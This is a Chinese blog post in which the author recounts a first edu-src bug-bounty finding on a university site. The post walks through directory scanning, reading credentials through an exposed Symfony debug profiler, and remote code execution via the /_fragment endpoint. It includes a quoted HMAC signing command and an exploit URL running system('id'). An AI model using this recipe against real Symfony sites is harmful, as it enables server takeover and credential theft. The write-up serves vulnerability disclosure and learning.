<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.8.0" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.8.0" type="image/png" sizes="32x32"><meta name="google-site-verification" content="tYBqKqGQ7mpSbOE7JkFSC906ld3TLjwjaZMJLfsfmqg"><meta name="description" content="第一次挖到edu-src的漏洞（一直很羡慕别的师傅可以挖到现实生活中的漏洞、拿到证书！！都快羡慕死了），非常激动开心啦！！！达成了从0到1！！！还是武汉大学的漏洞啦！（选择武汉大学的原因是因为挺多好朋友在武汉大学的): 先用fofa搜索武汉大学相关站点，找到比较偏僻的一个站点，这里用http:&#x2F;&#x2F;example.com来替代 然后开始渗透测试！！，先尝试了admin:123456登录发现失败，然后">
<meta property="og:type" content="article">
<meta property="og:title" content="记第一次edu-src漏洞挖掘">
<meta property="og:url" content="https://cyny666.github.io/2024/03/12/%E8%AE%B0%E7%AC%AC%E4%B8%80%E6%AC%A1edu-src%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/index.html">
<meta property="og:site_name" content="cyny666&#39;s world">
<meta property="og:description" content="第一次挖到edu-src的漏洞（一直很羡慕别的师傅可以挖到现实生活中的漏洞、拿到证书！！都快羡慕死了），非常激动开心啦！！！达成了从0到1！！！还是武汉大学的漏洞啦！（选择武汉大学的原因是因为挺多好朋友在武汉大学的): 先用fofa搜索武汉大学相关站点，找到比较偏僻的一个站点，这里用http:&#x2F;&#x2F;example.com来替代 然后开始渗透测试！！，先尝试了admin:123456登录发现失败，然后">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://miro.medium.com/v2/resize:fit:445/1*cl0wKxeLjjuRRcBOa67tzw.png">
<meta property="og:image" content="https://miro.medium.com/v2/resize:fit:1283/1*4rwG2WGet8xrEz6cmZQLfw.png">
<meta property="og:image" content="https://miro.medium.com/v2/resize:fit:1118/1*fUmZVp6k17Wcm6Qov--5eg.png">
<meta property="og:image" content="https://notes.sjtu.edu.cn/uploads/upload_8de54a7d828f2aeea5e7c13f06588bff.png">
<meta property="og:image" content="https://notes.sjtu.edu.cn/uploads/upload_ce40b4ef01450442a2fcd91b2f89d482.jpg">
<meta property="og:image" content="https://notes.sjtu.edu.cn/uploads/upload_1fa59dd5505a1889eb21c1ecbbdb2f95.png">
<meta property="og:image" content="https://notes.sjtu.edu.cn/uploads/upload_7d36570d7ba2a8497c9c16b4d589f069.png">
<meta property="og:image" content="https://notes.sjtu.edu.cn/uploads/upload_b6dbb87241f6a7372371af2f7a7fd195.png">
<meta property="og:image" content="https://www.ambionics.io/images/symfony-secret-fragment/1.png">
<meta property="og:image" content="https://notes.sjtu.edu.cn/uploads/upload_00a970844096326c38d17fef8892d7f5.png">
<meta property="og:image" content="c:/Users/86186/AppData/Roaming/Typora/typora-user-images/image-20240212222041562.png">
<meta property="article:published_time" content="2024-03-12T05:25:25.000Z">
<meta property="article:modified_time" content="2024-03-21T12:23:19.487Z">
<meta property="article:author" content="cyny666">
<meta property="article:tag" content="edu-src">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://miro.medium.com/v2/resize:fit:445/1*cl0wKxeLjjuRRcBOa67tzw.png"><title>记第一次edu-src漏洞挖掘 | cyny666's world</title><link ref="canonical" href="https://cyny666.github.io/2024/03/12/%E8%AE%B0%E7%AC%AC%E4%B8%80%E6%AC%A1edu-src%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.12.1/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.8.0"><link rel="stylesheet" href="css/custom.css"><script>var Stun = window.Stun || {};
var CONFIG = {
  root: '/',
  algolia: undefined,
  assistSearch: undefined,
  fontIcon: {"prompt":{"success":"fas fa-check-circle","info":"fas fa-arrow-circle-right","warning":"fas fa-exclamation-circle","error":"fas fa-times-circle"},"copyBtn":"fas fa-copy"},
  sidebar: {"offsetTop":"20px","tocMaxDepth":6},
  header: {"enable":true,"showOnPost":true,"scrollDownIcon":false},
  postWidget: {"endText":true},
  nightMode: {"enable":true},
  back2top: {"enable":true},
  codeblock: {"style":"default","highlight":"light","wordWrap":false},
  reward: false,
  fancybox: false,
  zoomImage: {"gapAside":"20px"},
  galleryWaterfall: undefined,
  lazyload: false,
  pjax: undefined,
  externalLink: {"icon":{"enable":true,"name":"fas fa-external-link-alt"}},
  shortcuts: undefined,
  prompt: {"copyButton":"复制","copySuccess":"复制成功","copyError":"复制失败"},
  sourcePath: {"js":"js","css":"css","images":"images"},
};

window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 6.3.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">首页</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">归档</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/categories/"><span class="header-nav-menu-item__icon"><i class="fas fa-layer-group"></i></span><span class="header-nav-menu-item__text">分类</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/about/"><span class="header-nav-menu-item__icon"><i class="user"></i></span><span class="header-nav-menu-item__text">关于</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/tags/"><span class="header-nav-menu-item__icon"><i class="fas fa-tags"></i></span><span class="header-nav-menu-item__text">标签</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Welcome to cyny666's world</div><div class="header-banner-info__subtitle">A world with code and failure</div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content" id="content"><!-- Just used to judge whether it is an article page--><div id="is-post"></div><div class="post"><header class="post-header"><h1 class="post-title">记第一次edu-src漏洞挖掘</h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">发表于</span><span class="post-meta-item__value">2024-03-12</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span class="post-meta-item__info">更新于</span><span class="post-meta-item__value">2024-03-21</span></span></div></header><div class="post-body"><p>第一次挖到edu-src的漏洞（一直很羡慕别的师傅可以挖到现实生活中的漏洞、拿到证书！！都快羡慕死了），非常激动开心啦！！！达成了从0到1！！！还是武汉大学的漏洞啦！（选择武汉大学的原因是因为挺多好朋友在武汉大学的):</p>
<p>先用fofa搜索武汉大学相关站点，找到比较偏僻的一个站点，这里用<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://example.com来替代/" >http://example.com来替代</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>然后开始渗透测试！！，先尝试了admin:123456登录发现失败，然后开始尝试弱口令密码登录，发现次数变多后就不行了，于是又检查很多很多（指在网站漫无目的的闲逛摆烂)，然后还是不行:sob:,然后用dirsearch开扫了一下(下次注意不能扫太暴力，要不自己容易被封，就被封了一个IP，后面改成热点才好一点),</p>
<p>发现了以下有效路径：</p>
<figure class="highlight plaintext"><figcaption><span>14KB</span><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://210.42.121.87/.DS_Store" >link</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></figcaption><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">200     3KB  http://example.com/.htaccess</span><br><span class="line">302   270B   http://example.com/_fragment    -&gt; REDIRECTS TO: /login</span><br><span class="line">302   270B   http://example.com/admin    -&gt; REDIRECTS TO: /login</span><br><span class="line">302   270B   http://example.com/admin/    -&gt; REDIRECTS TO: /login</span><br><span class="line">200    51KB  http://example.com/app.php</span><br><span class="line">500     0B   http://example.com/app_dev.php</span><br><span class="line">200    23KB  http://example.com/article</span><br><span class="line">200     0B   http://example.com/article/admin</span><br><span class="line">403    46B   http://example.com/config.php</span><br><span class="line">200   369B   http://example.com/crossdomain.xml</span><br><span class="line">200    20KB  http://example.com/favicon.ico</span><br><span class="line">200    23KB  http://example.com/group</span><br><span class="line">500    13KB  http://example.com/hello</span><br><span class="line">200    23KB  http://example.com/login</span><br><span class="line">302   350B   http://example.com/logout    -&gt; REDIRECTS TO: http://example.com/login</span><br><span class="line">200    22KB  http://example.com/mobile</span><br><span class="line">200    74B   http://example.com/page</span><br><span class="line">200    24KB  http://example.com/register</span><br><span class="line">200   105B   http://example.com/robots.txt</span><br><span class="line">200    24KB  http://example.com/search</span><br><span class="line">302   270B   http://example.com/settings    -&gt; REDIRECTS TO: /login</span><br><span class="line">200    21KB  http://example.com/tag</span><br><span class="line">200     3B   http://example.com/uploader</span><br><span class="line">200     0B   http://example.com/user/0</span><br><span class="line">200    25KB  http://example.com/user/2</span><br><span class="line">200     0B   http://example.com/user/1</span><br><span class="line">200     0B   http://example.com/user/admin</span><br><span class="line">200     0B   http://example.com/user/3</span><br><span class="line">200     0B   http://example.com/user/login.jsp</span><br><span class="line">200     0B   http://example.com/user/login.html</span><br><span class="line">200     0B   http://example.com/user/login.aspx</span><br><span class="line">200     0B   http://example.com/user/signup</span><br></pre></td></tr></table></div></figure>

<p>然后发现了.htaccess、robots.txt、crossdomain.xml等信息泄露路径，然后当时到太晚了，就把这个当信息泄露提交了（想着水一下第一个洞），结果果然失败了，给了一个这样的评价：审核评价： 无明显敏感内容或进一步利用证明，危害不足。</p>
<p>果然摸鱼混漏洞的想法是不正确的哈，还是要认认真真挖一些有价值的漏洞呀</p>
<p>过两天又重振旗鼓开始挖掘该域名，然而在一阵挖掘后，并没有发现半点的惊喜。于是小陈师傅（fw)准备关闭浏览器然后下班，可是就在最后一个浏览页的界面，突然发现到了一些奇怪的东西，在<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="http://example.com/app_dev.php%E7%9A%84%E4%B8%8B%E9%9D%A2%E7%AB%9F%E7%84%B6%E6%9C%89%E4%B8%80%E4%B8%AA%E8%B0%83%E8%AF%95%E7%AA%97%E5%8F%A3%EF%BC%8C%E6%88%91%E5%BE%88%E6%87%B5%E9%80%BC%E4%B8%8D%E7%9F%A5%E9%81%93%E8%BF%99%E4%B8%AA%E6%98%AF%E5%B9%B2%E4%BB%80%E4%B9%88%E7%9A%84%EF%BC%8C%E7%82%B9%E5%BC%80%E4%B9%8B%E5%90%8E%E6%98%AF%E8%BF%99%E6%A0%B7%EF%BC%88%E5%9B%A0%E4%B8%BA%E5%8E%9F%E6%9C%89%E7%BD%91%E7%AB%99%E5%B7%B2%E8%A2%AB%E5%85%B3%E9%97%AD%EF%BC%8C%E6%89%80%E4%BB%A5%E4%BB%8E%E7%BD%91%E4%B8%8A%E6%89%BE%E4%BA%86%E4%B8%80%E4%BA%9B%E5%85%B6%E4%BB%96%E7%B1%BB%E4%BC%BC%E7%9A%84%E5%9B%BE%EF%BC%89" >http://example.com/app_dev.php的下面竟然有一个调试窗口，我很懵逼不知道这个是干什么的，点开之后是这样（因为原有网站已被关闭，所以从网上找了一些其他类似的图）</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p><img src="https://miro.medium.com/v2/resize:fit:445/1*cl0wKxeLjjuRRcBOa67tzw.png" alt="img"></p>
<p><img src="https://miro.medium.com/v2/resize:fit:1283/1*4rwG2WGet8xrEz6cmZQLfw.png" alt="img"></p>
<p>从这里我拿到了phpinfo的所有值，连忙把这个东西提交了，提交为信息泄露，可是却得到了这样的评价：审核评价： 无明显敏感内容或进一步利用证明，危害不足。</p>
<p>怎么中国edu-src拿个漏洞这么严！！！phpinfo都不算信息泄露</p>
<p>然后我发现了<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://infosecwriteups.com/how-i-was-able-to-find-multiple-vulnerabilities-of-a-symfony-web-framework-web-application-2b82cd5de144" >这篇博客</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span>，这里吐槽一下：国外的优质博客是真的多，可惜有的时候比较急的时候要用翻译，不急的情况下感觉可以慢慢看、垃圾的英语水平！！然后我在这篇博客下学到这个利用方式：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">我找到了Symfony 3.4版本数据库默认配置文件位置，即***app/config/parameters.yml\***</span><br></pre></td></tr></table></div></figure>

<p>于是我打开这个网址&#x2F;app_dev.php&#x2F;_profiler&#x2F;open?file&#x3D;app&#x2F;config&#x2F;parameters.yml</p>
<p>然后GET到了一些数据库的账号密码、还有一些其他的东西，大概如下这样：</p>
<p><img src="https://miro.medium.com/v2/resize:fit:1118/1*fUmZVp6k17Wcm6Qov--5eg.png" alt="img"></p>
<p>然后赶紧把这个信息泄露提交了（当时我的想法是：不敢仔细看这个数据，感觉能得到一个中等的rank），然后就把这个漏洞提交了，然而只拿到了rank2，然后也很激动的发了pyq、<img src="https://notes.sjtu.edu.cn/uploads/upload_8de54a7d828f2aeea5e7c13f06588bff.png"><img src="https://notes.sjtu.edu.cn/uploads/upload_ce40b4ef01450442a2fcd91b2f89d482.jpg"></p>
<p>我很不服于只有rank2:sob:,于是问了教育平台的管理员莫言这个漏洞怎么只有rank2，感觉泄露了很多关键的账号密码信息、然后得到了回复：不能利用的文件，只有这个分数，你要证明这个文件可以利用！！！:sob:,原本其实自己也在打马虎眼，想着有了账号密码就可以摆烂了！！！随便水水报告就行了，谁知道还要去证明其可以利用：然后就开始了小陈师傅的利用之旅</p>
<p>我先看到了几个端口的开放情况，发现关键的端口都是被封闭的！！！怎么把路给我封死了啊！然后我注意到一个点：里面有一个secret字段在  secret:      ThisTokenIsNotSoSecretChangeIt</p>
<p>我原本一直以为这是数据库的认证方式，比如密钥什么的。然后我就开始了新的google搜索！！！然后我发现了宝藏</p>
<p>在我搜索symfony secret 的利用然后弹出来下面这个网站:</p>
<p><span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-web/symphony/~/comments" >https://book.hacktricks.xyz/v/cn/network-services-pentesting/pentesting-web/symphony/~/comments</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>一开始一看全黑，还懒得看，还好我看了</p>
<p><img src="https://notes.sjtu.edu.cn/uploads/upload_1fa59dd5505a1889eb21c1ecbbdb2f95.png"></p>
<p>然后我点开第一个博客，然后我发现了这一个是<span class="exturl"><a class="exturl__link"   target="_blank" rel="noopener" href="https://www.ambionics.io/blog/symfony-secret-fragment" >宝藏</a><span class="exturl__icon"><i class="fas fa-external-link-alt"></i></span></span></p>
<p>可惜他是全英的，我只能把他翻译了然后去看，然后我注意到这个框架用于<code>/_fragment</code>运行任意代码，而且是基于secret，我当时还没把这个secret和我的secret联想起来，直到我看到这个</p>
<p><img src="https://notes.sjtu.edu.cn/uploads/upload_7d36570d7ba2a8497c9c16b4d589f069.png"></p>
<p>他妈的，这个secret跟我的secret不是刚好的一样吗，妈的</p>
<p>然后我扫到了这个，我当时还在php中的环境中找secret，殊不知secret已经被我获取了<img src="https://notes.sjtu.edu.cn/uploads/upload_b6dbb87241f6a7372371af2f7a7fd195.png"></p>
<p>然后思路就豁然开朗了！我拿到secret就可以用这个文章所运用的方法来实现RCE了，实现成功的时候激动的手在颤抖</p>
<p>下面是文章中的例子，这里localhost:8000是例子中的域名，50c8215b436ebfcc1d568effb624a40e是secret</p>
<p>通过检查<code>http://localhost:8000/_fragment?_hash=lNweS5nNP8QCtMqyqrW8HIl4j9JXIfscGeRm/cmFOh8=</code>，我们现在有了一个<code>404</code>状态代码。签名是正确的，但我们没有指定任何请求属性，因此 Symfony 找不到我们的控制器。</p>
<p>由于我们可以使用任何参数调用任何方法，因此我们可以例如 pick <code>system($command, $return_value)</code>，并提供如下所示的有效负载：</p>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ page=&quot;http://localhost:8000/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&quot;</span><br><span class="line">$ python -c &quot;import base64, hmac, hashlib; print(base64.b64encode(hmac.HMAC(b&#x27;50c8215b436ebfcc1d568effb624a40e&#x27;, b&#x27;$page&#x27;, hashlib.sha256).digest()))&quot;</span><br><span class="line">b&#x27;GFhQ4Hr1LIA8mO1M/qSfwQaSM8xQj35vPhyrF3hvQyI=&#x27;</span><br></pre></td></tr></table></div></figure>

<p>我们现在可以访问漏洞利用 URL：<code>http://localhost:8000/_fragment?_path=_controller%3Dsystem%26command%3Did%26return_value%3Dnull&amp;_hash=GFhQ4Hr1LIA8mO1M/qSfwQaSM8xQj35vPhyrF3hvQyI=</code></p>
<p>然后我们会发现我们的命令被成功执行了:</p>
<p><img src="https://www.ambionics.io/images/symfony-secret-fragment/1.png" alt="img"></p>
<p>发现这个漏洞让我特别兴奋，人生中的第一个RCE漏洞，赶紧提交了然后发了pyq、感觉非常兴奋，当天晚上熬了很久，但是很奇怪，过了一段时间后这个网站就貌似被关了，然后一直也打不开，我的想法是因为我提交的第一个信息泄露的漏洞让作者关闭了网站。</p>
<p><img src="https://notes.sjtu.edu.cn/uploads/upload_00a970844096326c38d17fef8892d7f5.png"></p>
<p>但是在我焦急的几天等待后，我发现我提交的这个漏洞被通过了，长舒一口气，感觉可能是审核者在网站没有关的时候成功复现了我的这个漏洞。于是给我了同意，但是为什么这么晚才同意啊，这几天快吓死我了，还在想着怎么跟踪这个网站blabla，总归是有惊无险的拿下了RCE(注意以后挖洞也注意法律，不要违背法律的界限)、也终究是走出了现实生活中挖洞的第一步、、cyy以后加油</p>
<p><img src="C:/Users/86186/AppData/Roaming/Typora/typora-user-images/image-20240212222041562.png" alt="image-20240212222041562"></p>
<p>可惜忘把图标下载下来了，要不感觉可以批量刷一下:sob:</p>
</div><footer class="post-footer"><div class="post-ending ending"><div class="ending__text">------ 本文结束，感谢您的阅读 ------</div></div><div class="post-copyright copyright"><div class="copyright-author"><span class="copyright-author__name">本文作者: </span><span class="copyright-author__value"><a href="https://cyny666.github.io">cyny666</a></span></div><div class="copyright-link"><span class="copyright-link__name">本文链接: </span><span class="copyright-link__value"><a href="https://cyny666.github.io/2024/03/12/%E8%AE%B0%E7%AC%AC%E4%B8%80%E6%AC%A1edu-src%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/">https://cyny666.github.io/2024/03/12/%E8%AE%B0%E7%AC%AC%E4%B8%80%E6%AC%A1edu-src%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/</a></span></div><div class="copyright-notice"><span class="copyright-notice__name">版权声明: </span><span class="copyright-notice__value">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" rel="external nofollow" target="_blank">BY-NC-SA</a> 许可协议。转载请注明出处！</span></div></div><div class="post-tags"><span class="post-tags-item"><span class="post-tags-item__icon"><i class="fas fa-tag"></i></span><a class="post-tags-item__link" href="https://cyny666.github.io/tags/edu-src/">edu-src</a></span></div><nav class="post-paginator paginator"><div class="paginator-next"><a class="paginator-next__link" href="/2024/02/09/EnableMe/"><span class="paginator-prev__text">EnableMe</span><span class="paginator-next__icon"><i class="fas fa-angle-right"></i></span></a></div></nav></footer></div></div></div><div class="sidebar-wrap" id="sidebar-wrap"><aside class="sidebar" id="sidebar"><div class="sidebar-nav"><span class="sidebar-nav-toc current">文章目录</span><span class="sidebar-nav-ov">站点概览</span></div><section class="sidebar-toc"></section><!-- ov = overview--><section class="sidebar-ov hide"><div class="sidebar-ov-author"><div class="sidebar-ov-author__avatar"><img class="sidebar-ov-author__avatar_img" src="/images/icons/obj.jpg" alt="avatar"></div><p class="sidebar-ov-author__text">cyny666</p></div><div class="sidebar-ov-state"><a class="sidebar-ov-state-item sidebar-ov-state-item--posts" href="/archives/"><div class="sidebar-ov-state-item__count">8</div><div class="sidebar-ov-state-item__name">归档</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--categories" href="/categories/"><div class="sidebar-ov-state-item__count">3</div><div class="sidebar-ov-state-item__name">分类</div></a><a class="sidebar-ov-state-item sidebar-ov-state-item--tags" href="/tags/"><div class="sidebar-ov-state-item__count">6</div><div class="sidebar-ov-state-item__name">标签</div></a></div><div class="sidebar-ov-cc"><a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.en" target="_blank" rel="noopener" data-popover="知识共享许可协议" data-popover-pos="up"><img src="/images/cc-by-nc-sa.svg"></a></div></section><div class="sidebar-reading"><div class="sidebar-reading-info"><span class="sidebar-reading-info__text">你已阅读了 </span><span class="sidebar-reading-info__num">0</span><span class="sidebar-reading-info__perc">%</span></div><div class="sidebar-reading-line"></div></div></aside></div><div class="clearfix"></div></div></main><footer class="footer" id="footer"><div class="footer-inner"><div><span>Copyright © 2024</span><span class="footer__icon"><i class="fas fa-heart"></i></span><span>cyny666</span></div><div><span>由 <a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> 强力驱动</span><span> v6.3.0</span><span class="footer__devider">|</span><span>主题 - <a href="https://github.com/liuyib/hexo-theme-stun/" title="Stun" target="_blank" rel="noopener">Stun</a></span><span> v2.8.0</span></div></div></footer><div class="loading-bar" id="loading-bar"><div class="loading-bar__progress"></div></div><div class="back2top" id="back2top"><span class="back2top__icon"><i class="fas fa-rocket"></i></span></div></div><script src="https://cdn.jsdelivr.net/npm/jquery@v3.4.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@1.5.2/velocity.ui.min.js"></script><script src="/js/utils.js?v=2.8.0"></script><script src="/js/stun-boot.js?v=2.8.0"></script><script src="/js/scroll.js?v=2.8.0"></script><script src="/js/header.js?v=2.8.0"></script><script src="/js/sidebar.js?v=2.8.0"></script></body></html>